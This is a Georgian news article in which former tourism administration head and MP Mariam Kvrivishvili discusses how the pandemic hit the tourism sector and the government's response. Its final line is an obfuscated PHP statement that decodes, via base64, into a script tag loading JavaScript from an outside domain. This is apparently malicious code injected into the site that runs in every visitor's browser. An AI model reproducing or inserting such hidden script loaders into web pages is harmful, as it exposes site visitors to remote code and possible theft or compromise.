celsiusi
ავერსი საქკაბელი
ტურიზმის ეროვნული ადმინისტრაციის ყოფილმა ხელმძღვანელმა და ამჟამად დეპუტატმა მარიამ ქვრივიშვილმა გადაცემა „ქალების ნარატივში“ პანდემიის გავლენით ტურიზმის სექტორში არსებულ რთულ მდგომარეობაზე ისაუბრა და კითხვაზე - "კერძო სექტორში რომ ყოფილიყო, იქნებოდა თუ არა მთავრობის გადაწყვეტილებებით კმაყოფილი" თქვა, რომ მისთვის ამ კითხვაზე პასუხის გაცემა რთულია.
 
„ძალიან ბევრჯერ მიფიქრია ამ კითხვაზე. როდესაც აღმასრულებელი გუნდის ნაწილი ვიყავი, ალბათ პირველივე დღიდან, როდესაც ტურიზმის ადმინისტრაციის ხელმძღვანელი გავხდი, სულ ვფიქრობდი, ესა თუ ის გადაწყვეტილება როგორ იმოქმედებდა ჩემზე ან ჩემს კოლეგებზე; როდესაც COVID-19 ჩვენს რეალობაში შემოვიდა, საქართველოსაც მოუწია, სამწუხაროდ, იმ რეგულაციების შემოტანა და გატარება, რომელიც ჩვენი მოსახლეობის ჯანმრთელობას და ინფიცირებულთა შემცირებას უზრუნველყოფდა. გახსნაზე საუბრის დაწყების შემდეგ, ჩემთვის მთავარი პრიორიტეტი იყო რეგულაციებთან დაკავშირებული ყველა გადაწყვეტილების კერძო სექტორთან ერთად განხილვა. ეს ასეც მოხდა და საკმაოდ წარმატებითაც, რადგან თავად ინდუსტრია მუშაობის პროცესს ასე აფასებს.
 
იყო ტურიზმის სექტორის წარმომადგენელი და იყო კმაყოფილი იმ შედეგით, რაც 1 წლის განმავლობაში დაიდო, რთულია. ეს არის ინდუსტრია, რომელიც გლობალურად მთელი მსოფლიოს მასშტაბით გაჩერდა და არ წარმომიდგენია რომელიმე ავიაკომპანია, ტურისტული კომპანია, სასტუმრო თუ გიდი, რომ კმაყოფილი იყოს მსოფლიოს ნებისმიერ წერტილში იმ ვითარებით, რაც არის... უშუალოდ, როგორც ქვეყნის მოქალაქეს, ალბათ ობიექტური ვიქნები და ვიტყვი, რომ კმაყოფილების შეგრძნება მაქვს“, - განაცხადა მარიამ ქვრივიშვილმა.
 
მისივე შეფასებით, კომუნიკაციის მაღალმა ხარისხმა უზრუნველყო ის, რომ დარგს დღეს შუეძლია პროაქტიული იყოს.
 
„დღეს, როდესაც ვესაუბრებით ბიზნესს - ის გაურკვევლობაში აღარ არის და პოზიტიურია. დღეს ტურიზმის სექტორის ყველა წარმომადგენელს შეუძლია პროაქტიული იყოს იმ ქვეყნების მიმართულებით, სადაც ბოლო წლების განმავლობაში საქართველოს მხრიდან მხარჯველუნარიანი ტურისტების ნაკადების გაზრდისთვის ბევრი რამ გაკეთდა - ისრაელი, სპარსეთის ყურის, ევროკავშირის ქვეყნები და ა.შ.“, - განაცხადა მარიამ ქვრივიშვილმა.
1440
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");